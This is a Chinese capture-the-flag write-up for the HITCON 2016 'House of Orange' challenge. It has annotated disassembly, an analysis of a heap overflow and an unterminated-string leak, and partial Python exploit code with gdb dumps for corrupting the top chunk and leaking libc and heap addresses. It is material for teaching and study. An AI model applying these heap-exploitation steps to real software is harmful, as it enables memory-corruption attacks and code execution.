我的书签
添加书签
移除书签6.1.24 pwn HITCONCTF2016 House_of_Orange
题目复现
$ file houseoforangehouseoforange: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=a58bda41b65d38949498561b0f2b976ce5c0c301, stripped$ checksec -f houseoforangeRELRO STACK CANARY NX PIE RPATH RUNPATH FORTIFY Fortified Fortifiable FILEFull RELRO Canary found NX enabled PIE enabled No RPATH No RUNPATH Yes 1 3 houseoforange$ strings libc-2.23.so | grep "GNU C"GNU C Library (Ubuntu GLIBC 2.23-0ubuntu3) stable release version 2.23, by Roland McGrath et al.Compiled by GNU CC version 5.3.1 20160413.
64 位程序,保护全开,默认开启 ASLR。
在 Ubuntu16.04 上玩一下:
$ ./houseoforange+++++++++++++++++++++++++++++++++++++@ House of Orange @+++++++++++++++++++++++++++++++++++++1. Build the house2. See the house3. Upgrade the house4. Give up+++++++++++++++++++++++++++++++++++++Your choice : 1 <-- Build a houseLength of name :20Name :AAAAAAAAAAAAAAAAAAAPrice of Orange:1+++++++++++++++++++++++++++++++++++++1. Red2. Green3. Yellow4. Blue5. Purple6. Cyan7. White+++++++++++++++++++++++++++++++++++++Color of Orange:1Finish+++++++++++++++++++++++++++++++++++++@ House of Orange @+++++++++++++++++++++++++++++++++++++1. Build the house2. See the house3. Upgrade the house4. Give up+++++++++++++++++++++++++++++++++++++Your choice : 3 <-- Upgrade the houseLength of name :10Name:BBBBBBBBBBPrice of Orange: +++++++++++++++++++++++++++++++++++++1. Red2. Green3. Yellow4. Blue5. Purple6. Cyan7. White+++++++++++++++++++++++++++++++++++++Color of Orange: 1Finish+++++++++++++++++++++++++++++++++++++@ House of Orange @+++++++++++++++++++++++++++++++++++++1. Build the house2. See the house3. Upgrade the house4. Give up+++++++++++++++++++++++++++++++++++++Your choice : 2 <-- See the houseName of house : BBBBBBBBBBAAAAAAAAAPrice of orange : 0__\/.--,//_.'.-""-/""----../ . . . . . . . \/ . . . . . . . . \|. 乂 . . . 乂. .|\ . . . . . . . . |\. . . . . . . . ./\ . . . *. . . /'-.__.__.__._-'+++++++++++++++++++++++++++++++++++++@ House of Orange @+++++++++++++++++++++++++++++++++++++1. Build the house2. See the house3. Upgrade the house4. Give up+++++++++++++++++++++++++++++++++++++Your choice : 4give up
程序允许我们对 house 进行 Build、See 和 Upgrade 的操作。可以看到在 See 的时候似乎有点问题,”A”的字符串应该是 Upgrade 之前的,但这里还是被打印了出来,猜测可能存在信息泄露,需要重点关注。
题目解析
Build the house
[0x00000af0]> pdf @ sub.Too_many_house_d37/ (fcn) sub.Too_many_house_d37 431| sub.Too_many_house_d37 (int arg_7h, int arg_1000h, int arg_ddaah);| ; var int local_18h @ rbp-0x18| ; var int local_14h @ rbp-0x14| ; var int local_10h @ rbp-0x10| ; var int local_8h @ rbp-0x8| ; var int local_0h @ rbp-0x0| ; arg int arg_7h @ rbp+0x7| ; arg int arg_1000h @ rbp+0x1000| ; arg int arg_ddaah @ rbp+0xddaa| ; CALL XREF from 0x000013fd (main)| 0x00000d37 push rbp| 0x00000d38 mov rbp, rsp| 0x00000d3b sub rsp, 0x20| 0x00000d3f lea rax, [0x00203070] ; [0x00203070] 存放 house_num| 0x00000d46 mov eax, dword [rax]| 0x00000d48 cmp eax, 3| ,=< 0x00000d4b jbe 0xd63 ; 最多 4 个 house| | 0x00000d4d lea rdi, str.Too_many_house ; 0x1e3f ; "Too many house"| | 0x00000d54 call sym.imp.puts ; int puts(const char *s)| | 0x00000d59 mov edi, 1| | 0x00000d5e call sym.imp._exit ; void _exit(int status)| | ; CODE XREF from 0x00000d4b (sub.Too_many_house_d37)| `-> 0x00000d63 mov edi, 0x10| 0x00000d68 call sym.imp.malloc ; rax = malloc(0x10) 给 house struct 分配空间| 0x00000d6d mov qword [local_10h], rax ; house 的地址放到 [local_10h]| 0x00000d71 lea rdi, str.Length_of_name_: ; 0x1e4e ; "Length of name :"| 0x00000d78 mov eax, 0| 0x00000d7d call sym.imp.printf ; int printf(const char *format)| 0x00000d82 mov eax, 0| 0x00000d87 call sub.__read_chk_c65 ; 读入 length| 0x00000d8c mov dword [local_18h], eax ; length 放到 [local_18h]| 0x00000d8f cmp dword [local_18h], 0x1000 ; [0x1000:4]=0x2062058d| ,=< 0x00000d96 jbe 0xd9f ; length 小于等于 0x1000 时跳转| | 0x00000d98 mov dword [local_18h], 0x1000 ; 否则 length 设置为 0x1000| | ; CODE XREF from 0x00000d96 (sub.Too_many_house_d37)| `-> 0x00000d9f mov eax, dword [local_18h]| 0x00000da2 mov rdi, rax| 0x00000da5 call sym.imp.malloc ; rax = malloc(length) 给 name 分配空间| 0x00000daa mov rdx, rax ; name 的地址放到 rdx| 0x00000dad mov rax, qword [local_10h] ; 取出 house| 0x00000db1 mov qword [rax + 8], rdx ; house->name = name| 0x00000db5 mov rax, qword [local_10h]| 0x00000db9 mov rax, qword [rax + 8] ; 取出 house->name| 0x00000dbd test rax, rax| ,=< 0x00000dc0 jne 0xdd8 ; house->name 不为空时跳转| | 0x00000dc2 lea rdi, str.Malloc_error ; 否则报错并退出| | 0x00000dc9 call sym.imp.puts ; int puts(const char *s)| | 0x00000dce mov edi, 1| | 0x00000dd3 call sym.imp._exit ; void _exit(int status)| | ; CODE XREF from 0x00000dc0 (sub.Too_many_house_d37)| `-> 0x00000dd8 lea rdi, str.Name_: ; 0x1e70 ; "Name :"| 0x00000ddf mov eax, 0| 0x00000de4 call sym.imp.printf ; int printf(const char *format)| 0x00000de9 mov rax, qword [local_10h]| 0x00000ded mov rax, qword [rax + 8] ; 取出 house->name| 0x00000df1 mov edx, dword [local_18h] ; 取出 length| 0x00000df4 mov esi, edx| 0x00000df6 mov rdi, rax| 0x00000df9 call sub.read_c20 ; 调用 read_c20(house->name, length) 读入 name| 0x00000dfe mov esi, 8| 0x00000e03 mov edi, 1| 0x00000e08 call sym.imp.calloc ; rax = calloc(1, 8) 分配一个 8 bytes 的空间作为 orange struct| 0x00000e0d mov qword [local_8h], rax ; orange 的地址放到 [local_8h]| 0x00000e11 lea rdi, [0x00001e77] ; "Price of Orange:"| 0x00000e18 mov eax, 0| 0x00000e1d call sym.imp.printf ; int printf(const char *format)| 0x00000e22 mov eax, 0| 0x00000e27 call sub.__read_chk_c65 ; 读入 price| 0x00000e2c mov edx, eax ; price 赋值给 edx| 0x00000e2e mov rax, qword [local_8h] ; 取出 orange| 0x00000e32 mov dword [rax], edx ; orange->price = price| 0x00000e34 mov eax, 0| 0x00000e39 call sub._cc4 ; 打印 color 菜单| 0x00000e3e lea rdi, [0x00001e88] ; "Color of Orange:"| 0x00000e45 mov eax, 0| 0x00000e4a call sym.imp.printf ; int printf(const char *format)| 0x00000e4f mov eax, 0| 0x00000e54 call sub.__read_chk_c65 ; 读入 color| 0x00000e59 mov dword [local_14h], eax ; color 放到 [local_14h]| 0x00000e5c cmp dword [local_14h], 0xddaa ; [0xddaa:4]=-1| ,=< 0x00000e63 je 0xe87 ; color 等于 0xddaa 时跳转| | 0x00000e65 cmp dword [local_14h], 0| ,==< 0x00000e69 jle 0xe71| || 0x00000e6b cmp dword [local_14h], 7 ; [0x7:4]=0| ,===< 0x00000e6f jle 0xe87| ||| ; CODE XREF from 0x00000e69 (sub.Too_many_house_d37)| |`--> 0x00000e71 lea rdi, str.No_such_color ; 0x1e99 ; "No such color"| | | 0x00000e78 call sym.imp.puts ; int puts(const char *s)| | | 0x00000e7d mov edi, 1| | | 0x00000e82 call sym.imp._exit ; 当 color != 0xddaa && (color <= 0 || color > 7) 时退出程序| | | ; CODE XREF from 0x00000e63 (sub.Too_many_house_d37)| | | ; CODE XREF from 0x00000e6f (sub.Too_many_house_d37)| `-`-> 0x00000e87 cmp dword [local_14h], 0xddaa ; [0xddaa:4]=-1| ,=< 0x00000e8e jne 0xe9c ; color 不等于 0 时跳转| | 0x00000e90 mov rax, qword [local_8h] ; 否则取出 orange| | 0x00000e94 mov edx, dword [local_14h] ; 取出 color| | 0x00000e97 mov dword [rax + 4], edx ; orange->color = color| ,==< 0x00000e9a jmp 0xea9| || ; CODE XREF from 0x00000e8e (sub.Too_many_house_d37)| |`-> 0x00000e9c mov eax, dword [local_14h] ; 取出 color| | 0x00000e9f lea edx, [rax + 0x1e] ; edx = color + 0x1e| | 0x00000ea2 mov rax, qword [local_8h] ; 取出 orange| | 0x00000ea6 mov dword [rax + 4], edx ; orange->color = edx == color + 0x1e| | ; CODE XREF from 0x00000e9a (sub.Too_many_house_d37)| `--> 0x00000ea9 mov rax, qword [local_10h] ; 取出 house| 0x00000ead mov rdx, qword [local_8h] ; 取出 orange| 0x00000eb1 mov qword [rax], rdx ; house->org = orange| 0x00000eb4 lea rax, [0x00203068]| 0x00000ebb mov rdx, qword [local_10h]| 0x00000ebf mov qword [rax], rdx ; 将 house 的地址放到 [0x00203068]| 0x00000ec2 lea rax, [0x00203070]| 0x00000ec9 mov eax, dword [rax]| 0x00000ecb lea edx, [rax + 1] ; house_num += 1| 0x00000ece lea rax, [0x00203070]| 0x00000ed5 mov dword [rax], edx| 0x00000ed7 lea rdi, str.Finish ; 0x1ea7 ; "Finish"| 0x00000ede call sym.imp.puts ; int puts(const char *s)| 0x00000ee3 nop| 0x00000ee4 leave\ 0x00000ee5 ret
通过对这段代码的分析可以得到两个结构体:
struct orange{int price;int color;} orange;struct house {orange *org;char *name;} house;
Build 最多可以进行 4 次,整个过程有 2 个 malloc 和 1 个 calloc:
malloc(0x10):给 house struct 分配空间malloc(length):给 name 分配空间,其中 length 来自用户输入,如果大于 0x1000,则按照 0x1000 处理。calloc(1, 8):给 orange struct 分配空间
那么我们再来看一下用于读入 name 的函数:
[0x00000af0]> pdf @ sub.read_c20/ (fcn) sub.read_c20 69| sub.read_c20 ();| ; var int local_1ch @ rbp-0x1c| ; var int local_18h @ rbp-0x18| ; var int local_4h @ rbp-0x4| ; var int local_0h @ rbp-0x0| ; CALL XREF from 0x00000df9 (sub.Too_many_house_d37)| ; CALL XREF from 0x00001119 (sub.You_can_t_upgrade_more_7c)| 0x00000c20 push rbp| 0x00000c21 mov rbp, rsp| 0x00000c24 sub rsp, 0x20| 0x00000c28 mov qword [local_18h], rdi| 0x00000c2c mov dword [local_1ch], esi| 0x00000c2f mov edx, dword [local_1ch]| 0x00000c32 mov rax, qword [local_18h]| 0x00000c36 mov rsi, rax| 0x00000c39 mov edi, 0| 0x00000c3e call sym.imp.read ; 调用 read(0, house->name, length) 读入 name| 0x00000c43 mov dword [local_4h], eax| 0x00000c46 cmp dword [local_4h], 0| ,=< 0x00000c4a jg 0xc62| | 0x00000c4c lea rdi, str.read_error ; 0x14c8 ; "read error"| | 0x00000c53 call sym.imp.puts ; int puts(const char *s)| | 0x00000c58 mov edi, 1| | 0x00000c5d call sym.imp._exit ; void _exit(int status)| | ; CODE XREF from 0x00000c4a (sub.read_c20)| `-> 0x00000c62 nop| 0x00000c63 leave\ 0x00000c64 ret
这个函数在读入 length 长度的字符串后,没有在末尾加上 \x00 截断,正如我们上面看到的,可能导致信息泄露。
See the house
[0x00000af0]> pdf @ sub.Name_of_house_:__s_ee6/ (fcn) sub.Name_of_house_:__s_ee6 406| sub.Name_of_house_:__s_ee6 ();| ; CALL XREF from 0x00001409 (main)| 0x00000ee6 push rbp| 0x00000ee7 mov rbp, rsp| 0x00000eea lea rax, [0x00203068]| 0x00000ef1 mov rax, qword [rax] ; 取出 house| 0x00000ef4 test rax, rax| ,=< 0x00000ef7 je 0x106e ; 如果不存在 house,函数返回| | 0x00000efd lea rax, [0x00203068]| | 0x00000f04 mov rax, qword [rax] ; 取出 house| | 0x00000f07 mov rax, qword [rax] ; 取出 house->org| | 0x00000f0a mov eax, dword [rax + 4] ; 取出 house->org->color,即 orange->color| | 0x00000f0d cmp eax, 0xddaa| ,==< 0x00000f12 jne 0xf9d ; orange->color 不等于 0xddaa 时跳转| || 0x00000f18 lea rax, [0x00203068]| || 0x00000f1f mov rax, qword [rax]| || 0x00000f22 mov rax, qword [rax + 8] ; 取出 house->name| || 0x00000f26 mov rsi, rax| || 0x00000f29 lea rdi, str.Name_of_house_:__s ; 0x1eae ; "Name of house : %s\n"| || 0x00000f30 mov eax, 0| || 0x00000f35 call sym.imp.printf ; 打印 house->name| || 0x00000f3a lea rax, [0x00203068]| || 0x00000f41 mov rax, qword [rax]| || 0x00000f44 mov rax, qword [rax]| || 0x00000f47 mov eax, dword [rax] ; 取出 orange->price| || 0x00000f49 mov esi, eax| || 0x00000f4b lea rdi, str.Price_of_orange_:__d ; 0x1ec2 ; "Price of orange : %d\n"| || 0x00000f52 mov eax, 0| || 0x00000f57 call sym.imp.printf ; 打印 orange->price| || 0x00000f5c call sym.imp.rand ; rand_num = rand() 生成一个随机数| || 0x00000f61 mov edx, eax| || 0x00000f63 mov eax, edx| || 0x00000f65 sar eax, 0x1f| || 0x00000f68 shr eax, 0x1d| || 0x00000f6b add edx, eax| || 0x00000f6d and edx, 7 ; rand_num % 8| || 0x00000f70 sub edx, eax| || 0x00000f72 mov eax, edx| || 0x00000f74 mov edx, eax| || 0x00000f76 lea rax, [0x00203080]| || 0x00000f7d movsxd rdx, edx| || 0x00000f80 mov rax, qword [rax + rdx*8] ; rax = [0x00203080 + rand_num % 8]| || 0x00000f84 mov rsi, rax| || 0x00000f87 lea rdi, str.e_01_38_5_214m_s_e_0m ; 0x1ed8| || 0x00000f8e mov eax, 0| || 0x00000f93 call sym.imp.printf ; 打印 orange 图案| ,===< 0x00000f98 jmp 0x107a ; 跳转,函数返回| |`--> 0x00000f9d lea rax, [0x00203068]| | | 0x00000fa4 mov rax, qword [rax]| | | 0x00000fa7 mov rax, qword [rax]| | | 0x00000faa mov eax, dword [rax + 4] ; 取出 orange->color| | | 0x00000fad cmp eax, 0x1e| |,==< 0x00000fb0 jle 0xfc7 ; orange->color 小于等于 0x1e 时跳转,程序退出| ||| 0x00000fb2 lea rax, [0x00203068]| ||| 0x00000fb9 mov rax, qword [rax]| ||| 0x00000fbc mov rax, qword [rax]| ||| 0x00000fbf mov eax, dword [rax + 4] ; 否则取出 orange->color| ||| 0x00000fc2 cmp eax, 0x25 ; '%'| ,====< 0x00000fc5 jle 0xfdd ; orange->color 小于等于 0xfdd 时跳转| |||| ; CODE XREF from 0x00000fb0 (sub.Name_of_house_:__s_ee6)| ||`--> 0x00000fc7 lea rdi, str.Color_corruption ; 0x1eee ; "Color corruption!"| || | 0x00000fce call sym.imp.puts ; int puts(const char *s)| || | 0x00000fd3 mov edi, 1| || | 0x00000fd8 call sym.imp._exit ; void _exit(int status)| || | ; CODE XREF from 0x00000fc5 (sub.Name_of_house_:__s_ee6)| `----> 0x00000fdd lea rax, [0x00203068]| | | 0x00000fe4 mov rax, qword [rax]| | | 0x00000fe7 mov rax, qword [rax + 8] ; 取出 house->name| | | 0x00000feb mov rsi, rax| | | 0x00000fee lea rdi, str.Name_of_house_:__s ; 0x1eae ; "Name of house : %s\n"| | | 0x00000ff5 mov eax, 0| | | 0x00000ffa call sym.imp.printf ; 打印 house->name| | | 0x00000fff lea rax, [0x00203068]| | | 0x00001006 mov rax, qword [rax]| | | 0x00001009 mov rax, qword [rax]| | | 0x0000100c mov eax, dword [rax] ; 取出 orange->price| | | 0x0000100e mov esi, eax| | | 0x00001010 lea rdi, str.Price_of_orange_:__d ; 0x1ec2 ; "Price of orange : %d\n"| | | 0x00001017 mov eax, 0| | | 0x0000101c call sym.imp.printf ; 打印 house->price| | | 0x00001021 call sym.imp.rand ; rand_num = rand() 生成一个随机数| | | 0x00001026 mov edx, eax| | | 0x00001028 mov eax, edx| | | 0x0000102a sar eax, 0x1f| | | 0x0000102d shr eax, 0x1d| | | 0x00001030 add edx, eax| | | 0x00001032 and edx, 7 ; rand_num % 8| | | 0x00001035 sub edx, eax| | | 0x00001037 mov eax, edx| | | 0x00001039 mov edx, eax| | | 0x0000103b lea rax, [0x00203080]| | | 0x00001042 movsxd rdx, edx| | | 0x00001045 mov rdx, qword [rax + rdx*8] ; rdx = [0x00203080 + rand_num % 8]| | | 0x00001049 lea rax, [0x00203068]| | | 0x00001050 mov rax, qword [rax]| | | 0x00001053 mov rax, qword [rax]| | | 0x00001056 mov eax, dword [rax + 4] ; 取出 orange->color| | | 0x00001059 mov esi, eax| | | 0x0000105b lea rdi, str.e__dm_s_e_0m ; 0x1f00| | | 0x00001062 mov eax, 0| | | 0x00001067 call sym.imp.printf ; 打印 orange 图案| |,==< 0x0000106c jmp 0x107a| ||| ; CODE XREF from 0x00000ef7 (sub.Name_of_house_:__s_ee6)| ||`-> 0x0000106e lea rdi, str.No_such_house ; 0x1f0d ; "No such house !"| || 0x00001075 call sym.imp.puts ; int puts(const char *s)| || ; CODE XREF from 0x00000f98 (sub.Name_of_house_:__s_ee6)| || ; CODE XREF from 0x0000106c (sub.Name_of_house_:__s_ee6)| ``--> 0x0000107a pop rbp\ 0x0000107b ret
See 会打印出 house->name,orange->price 和 orange 图案。
Upgrade the house
[0x00000af0]> pdf @ sub.You_can_t_upgrade_more_7c/ (fcn) sub.You_can_t_upgrade_more_7c 379| sub.You_can_t_upgrade_more_7c (int arg_7h, int arg_1000h, int arg_ddaah);| ; var int local_18h @ rbp-0x18| ; var int local_14h @ rbp-0x14| ; var int local_0h @ rbp-0x0| ; arg int arg_7h @ rbp+0x7| ; arg int arg_1000h @ rbp+0x1000| ; arg int arg_ddaah @ rbp+0xddaa| ; CALL XREF from 0x00001415 (main)| 0x0000107c push rbp| 0x0000107d mov rbp, rsp| 0x00001080 push rbx| 0x00001081 sub rsp, 0x18| 0x00001085 lea rax, [0x00203074]| 0x0000108c mov eax, dword [rax] ; 取出 upgrade_num,初始值为 0| 0x0000108e cmp eax, 2 ; 最多修改 3 次| ,=< 0x00001091 jbe 0x10a4 ; upgrade_num 小于等于 2 时跳转| | 0x00001093 lea rdi, str.You_can_t_upgrade_more ; 0x1f1d ; "You can't upgrade more"| | 0x0000109a call sym.imp.puts ; int puts(const char *s)| ,==< 0x0000109f jmp 0x11f0 ; 否则函数返回| || ; CODE XREF from 0x00001091 (sub.You_can_t_upgrade_more_7c)| |`-> 0x000010a4 lea rax, [0x00203068]| | 0x000010ab mov rax, qword [rax] ; 取出 house| | 0x000010ae test rax, rax| |,=< 0x000010b1 jne 0x10c4 ; house 不为 0 时跳转| || 0x000010b3 lea rdi, str.No_such_house ; 0x1f0d ; "No such house !"| || 0x000010ba call sym.imp.puts ; int puts(const char *s)| ,===< 0x000010bf jmp 0x11f0 ; 否则函数返回| ||| ; CODE XREF from 0x000010b1 (sub.You_can_t_upgrade_more_7c)| ||`-> 0x000010c4 lea rdi, str.Length_of_name_: ; 0x1e4e ; "Length of name :"| || 0x000010cb mov eax, 0| || 0x000010d0 call sym.imp.printf ; int printf(const char *format)| || ; DATA XREF from 0x00000d06 (sub._cc4)| || 0x000010d5 mov eax, 0| || 0x000010da call sub.__read_chk_c65 ; 读入 length| || 0x000010df mov dword [local_18h], eax ; 将 length 放到 [local_18h]| || 0x000010e2 cmp dword [local_18h], 0x1000 ; [0x1000:4]=0x2062058d| ||,=< 0x000010e9 jbe 0x10f2 ; length 小于等于 0x1000 时跳转| ||| 0x000010eb mov dword [local_18h], 0x1000 ; 否则 length 赋值为 0x1000| ||| ; CODE XREF from 0x000010e9 (sub.You_can_t_upgrade_more_7c)| ||`-> 0x000010f2 lea rdi, str.Name: ; 0x1f34 ; "Name:"| || 0x000010f9 mov eax, 0| || 0x000010fe call sym.imp.printf ; int printf(const char *format)| || 0x00001103 lea rax, [0x00203068]| || 0x0000110a mov rax, qword [rax]| || 0x0000110d mov rax, qword [rax + 8] ; 取出 house->name| || 0x00001111 mov edx, dword [local_18h] ; 取出 length| || 0x00001114 mov esi, edx| || 0x00001116 mov rdi, rax| || 0x00001119 call sub.read_c20 ; 调用 read_c20(house->name, length) 读入 name| || 0x0000111e lea rdi, str.Price_of_Orange: ; 0x1f3a ; "Price of Orange: "| || 0x00001125 mov eax, 0| || 0x0000112a call sym.imp.printf ; int printf(const char *format)| || 0x0000112f lea rax, [0x00203068]| || 0x00001136 mov rax, qword [rax]| || 0x00001139 mov rbx, qword [rax] ; 取出 house->org,即 orange| || 0x0000113c mov eax, 0| || 0x00001141 call sub.__read_chk_c65 ; 读入 price| || 0x00001146 mov dword [rbx], eax ; orange->price = price| || 0x00001148 mov eax, 0| || 0x0000114d call sub._cc4 ; 打印 color 菜单| || 0x00001152 lea rdi, str.Color_of_Orange: ; 0x1f4c ; "Color of Orange: "| || 0x00001159 mov eax, 0| || 0x0000115e call sym.imp.printf ; int printf(const char *format)| || 0x00001163 mov eax, 0| || 0x00001168 call sub.__read_chk_c65 ; 读入 color| || 0x0000116d mov dword [local_14h], eax ; 将 color 放到 [local_14h]| || 0x00001170 cmp dword [local_14h], 0xddaa ; [0xddaa:4]=-1| ||,=< 0x00001177 je 0x119b ; color 等于 0xddaa 时跳转| ||| 0x00001179 cmp dword [local_14h], 0| ,====< 0x0000117d jle 0x1185| |||| 0x0000117f cmp dword [local_14h], 7 ; [0x7:4]=0| ,=====< 0x00001183 jle 0x119b| ||||| ; CODE XREF from 0x0000117d (sub.You_can_t_upgrade_more_7c)| |`----> 0x00001185 lea rdi, str.No_such_color ; 0x1e99 ; "No such color"| | ||| 0x0000118c call sym.imp.puts ; int puts(const char *s)| | ||| 0x00001191 mov edi, 1| | ||| 0x00001196 call sym.imp._exit ; 当 color != 0xddaa && (color <= 0 || color > 7) 时退出程序| | ||| ; CODE XREF from 0x00001183 (sub.You_can_t_upgrade_more_7c)| | ||| ; CODE XREF from 0x00001177 (sub.You_can_t_upgrade_more_7c)| `---`-> 0x0000119b cmp dword [local_14h], 0xddaa ; [0xddaa:4]=-1| ||,=< 0x000011a2 jne 0x11b9 ; color 不等于 0xddaa 时跳转| ||| 0x000011a4 lea rax, [0x00203068]| ||| 0x000011ab mov rax, qword [rax]| ||| 0x000011ae mov rax, qword [rax] ; 否则取出 house->org,即 orange| ||| 0x000011b1 mov edx, dword [local_14h] ; 取出 color| ||| 0x000011b4 mov dword [rax + 4], edx ; orange->color = color| ,====< 0x000011b7 jmp 0x11cf ; 跳转| |||| ; CODE XREF from 0x000011a2 (sub.You_can_t_upgrade_more_7c)| |||`-> 0x000011b9 lea rax, [0x00203068]| ||| 0x000011c0 mov rax, qword [rax]| ||| 0x000011c3 mov rax, qword [rax] ; 取出 house->org,即 orange| ||| 0x000011c6 mov edx, dword [local_14h] ; 取出 color| ||| 0x000011c9 add edx, 0x1e| ||| 0x000011cc mov dword [rax + 4], edx ; orange->color = color + 0x1e| ||| ; CODE XREF from 0x000011b7 (sub.You_can_t_upgrade_more_7c)| `----> 0x000011cf lea rax, [0x00203074]| || 0x000011d6 mov eax, dword [rax] ; 取出 upgrade_num| || 0x000011d8 lea edx, [rax + 1] ; upgrade_num += 1| || 0x000011db lea rax, [0x00203074]| || 0x000011e2 mov dword [rax], edx| || 0x000011e4 lea rdi, str.Finish ; 0x1ea7 ; "Finish"| || 0x000011eb call sym.imp.puts ; int puts(const char *s)| || ; CODE XREF from 0x0000109f (sub.You_can_t_upgrade_more_7c)| || ; CODE XREF from 0x000010bf (sub.You_can_t_upgrade_more_7c)| ``--> 0x000011f0 add rsp, 0x18| 0x000011f4 pop rbx| 0x000011f5 pop rbp\ 0x000011f6 ret
Upgrade 最多可以进行 3 次,当确认 house 存在后,就直接在 orange->name 的地方读入长度为 length 的 name,然后读入新的 price 和 color。新的 length 同样来自用户输入,如果大于 0x1000,则按照 0x1000 处理。
这里的问题在于程序没有将新 length 与旧 length 做任何比较,如果新 length 大于 旧 length,那么将导致堆溢出。
漏洞利用
和常见的堆利用题目不同的是,这题只有 malloc 而没有 free,于是很多利用方法都用不了。当然这题是独创了一种 house-of-orange 的利用方法,这种方法利用堆溢出修改 _IO_list_all 结构体,从而改变程序流,前提是能够泄漏堆和 libc,泄露的方法是触发位于 sysmalloc() 中的 _int_free() 将 top chunk 释放到 unsorted bin 中(详细内容参考章节 3.1.8 和 4.13)。
overwrite top chunk
def overwrite_top():build(0x10, 'AAAA')payload = "A" * 0x30payload += p64(0) + p64(0xfa1) # top chunk headerupgrade(0x41, payload)
第一步,覆盖 top chunk 的 size 域,以触发 sysmalloc()。创建第一个 house:
gdb-peda$ x/16gx 0x555555758010-0x100x555555758000: 0x0000000000000000 0x0000000000000021 <-- house 10x555555758010: 0x0000555555758050 0x00005555557580300x555555758020: 0x0000000000000000 0x0000000000000021 <-- name 10x555555758030: 0x0000000a41414141 0x00000000000000000x555555758040: 0x0000000000000000 0x0000000000000021 <-- orange 10x555555758050: 0x0000001f00000001 0x00000000000000000x555555758060: 0x0000000000000000 0x0000000000020fa1 <-- top chunk0x555555758070: 0x0000000000000000 0x0000000000000000
根据一定的规则修改 size,简单说就是这里 top chunk size 是 0x20fa1,那就修改为 0xfa1:
gdb-peda$ x/16gx 0x555555758010-0x100x555555758000: 0x0000000000000000 0x0000000000000021 <-- house 10x555555758010: 0x0000555555758050 0x00005555557580300x555555758020: 0x0000000000000000 0x0000000000000021 <-- name 10x555555758030: 0x4141414141414141 0x41414141414141410x555555758040: 0x4141414141414141 0x4141414141414141 <-- orange 10x555555758050: 0x0000001f00000001 0x41414141414141410x555555758060: 0x0000000000000000 0x0000000000000fa1 <-- fake top chunk0x555555758070: 0x000000000000000a 0x0000000000000000
leak libc
def leak_libc():global libc_basebuild(0x1000, 'AAAA') # _int_free in sysmallocbuild(0x400, 'A' * 7) # large chunklibc_base = u64(see()) - 0x3c4188 # fd pointerlog.info("libc_base address: 0x%x" % libc_base)
接下来分配一个大于 top chunk,小于 mp_.mmap_threshold 的 large chunk,此时将触发 sysmalloc() 中的 _int_free(),top chunk 将被释放到 unsorted bin 中,同时新的 top chunk 将由扩展方式分配出来:
gdb-peda$ x/26gx 0x555555758010-0x100x555555758000: 0x0000000000000000 0x0000000000000021 <-- house 10x555555758010: 0x0000555555758050 0x00005555557580300x555555758020: 0x0000000000000000 0x0000000000000021 <-- name 10x555555758030: 0x4141414141414141 0x41414141414141410x555555758040: 0x4141414141414141 0x4141414141414141 <-- orange 10x555555758050: 0x0000001f00000001 0x41414141414141410x555555758060: 0x0000000000000000 0x0000000000000021 <-- house 20x555555758070: 0x0000555555758090 0x00005555557790100x555555758080: 0x0000000000000000 0x0000000000000021 <-- orange 20x555555758090: 0x0000001f00000001 0x00000000000000000x5555557580a0: 0x0000000000000000 0x0000000000000f41 <-- old top chunk0x5555557580b0: 0x00007ffff7dd1b78 0x00007ffff7dd1b78 <-- fd, bk pointer0x5555557580c0: 0x0000000000000000 0x0000000000000000gdb-peda$ x/4gx 0x555555779010-0x100x555555779000: 0x0000000000000000 0x0000000000001011 <-- name 20x555555779010: 0x0000000a41414141 0x0000000000000000gdb-peda$ x/4gx 0x555555779010-0x10+0x10100x55555577a010: 0x0000000000000000 0x0000000000020ff1 <-- new top chunk0x55555577a020: 0x0000000000000000 0x0000000000000000
可以看到 old top chunk 已经被放到 unsorted bin 中了,其 fd, bk 指针指向 libc。接下来再分配一个 large chunk,这个 chunk 将从 old top chunk 中切下来,剩下的再放回 unsorted bin:
gdb-peda$ x/32gx 0x555555758010-0x100x555555758000: 0x0000000000000000 0x0000000000000021 <-- house 10x555555758010: 0x0000555555758050 0x00005555557580300x555555758020: 0x0000000000000000 0x0000000000000021 <-- name 10x555555758030: 0x4141414141414141 0x41414141414141410x555555758040: 0x4141414141414141 0x4141414141414141 <-- orange 10x555555758050: 0x0000001f00000001 0x41414141414141410x555555758060: 0x0000000000000000 0x0000000000000021 <-- house 20x555555758070: 0x0000555555758090 0x00005555557790100x555555758080: 0x0000000000000000 0x0000000000000021 <-- orange 20x555555758090: 0x0000001f00000001 0x00000000000000000x5555557580a0: 0x0000000000000000 0x0000000000000021 <-- house 30x5555557580b0: 0x00005555557584e0 0x00005555557580d00x5555557580c0: 0x0000000000000000 0x0000000000000411 <-- name 30x5555557580d0: 0x0a41414141414141 0x00007ffff7dd21880x5555557580e0: 0x00005555557580c0 0x00005555557580c00x5555557580f0: 0x0000000000000000 0x0000000000000000gdb-peda$ x/8gx 0x5555557580c0+0x4100x5555557584d0: 0x0000000000000000 0x0000000000000021 <-- orange 30x5555557584e0: 0x0000001f00000001 0x00000000000000000x5555557584f0: 0x0000000000000000 0x0000000000000af1 <-- old top chunk0x555555758500: 0x00007ffff7dd1b78 0x00007ffff7dd1b78 <-- fd, bk pointer
可以看到 name 3 上有遗留的 old top chunk 的 bk 指针。只要将其打印出来,通过计算即可得到 libc 的基址。
leak heap
def leak_heap():global heap_addrupgrade(0x10, 'A' * 15)heap_addr = u64(see()) - 0xc0 # fd_nextsize pointerlog.info("heap address: 0x%x" % heap_addr)
在上一步中我们还可以看到 name 3 上还有遗留的 fd_nextsize 和 bk_nextsize,这是因为在分配一个 large chunk 时,会先将 unsorted bin 中的 large chunk 取出放到 large bin 中。因为当前 large bin 是空的,所以 chunk 的 fd_nextsize 和 bk_nextsize 都指向自身:
/* maintain large bins in sorted order */if (fwd != bck){[...]}elsevictim->fd_nextsize = victim->bk_nextsize = victim;
所以这里我们通过修改 name 即可泄露出 heap 地址:
